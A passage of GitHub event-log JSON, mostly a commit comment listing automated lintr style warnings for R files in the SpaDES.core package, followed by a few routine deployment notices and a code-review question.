^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cdcbd216a82479792f8e745140e12887d0a20939/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T19:09:59Z"}
{"id":"7984908549","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29754687,"position":null,"line":null,"path":null,"commit_id":"cc0186eb245ebd82ebdaa691cbc6dc2aeb61a5c2","created_at":"2018-07-18T19:10:00Z","updated_at":"2018-07-18T19:10:00Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#pr-1](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T19:10:00Z"}
{"id":"7984910461","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29754690,"position":null,"line":null,"path":null,"commit_id":"d84075edebc78e989d66cffde7f283f77500e5de","created_at":"2018-07-18T19:10:25Z","updated_at":"2018-07-18T19:10:25Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/64b6167f9a1ca986d751e1dfdd9c1f7cd8ff6f06/scripts/deploy-multidev.sh)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d84075edebc78e989d66cffde7f283f77500e5de/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-18T19:10:25Z"}
{"id":"7984912944","type":"CommitCommentEvent","actor":{"login":"shahar3012"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29754693,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T19:10:55Z","updated_at":"2018-07-18T19:10:55Z","author_association":"CONTRIBUTOR","body":"`55` is the Firefox version. right?\r\nDid you check that it's working on Chrome 51? \r\nFor me it didn't work at previous versions of Rocket.Chat on Chrome 51.\r\n"}},"created_at":"2018-07-18T19:10:55Z"}
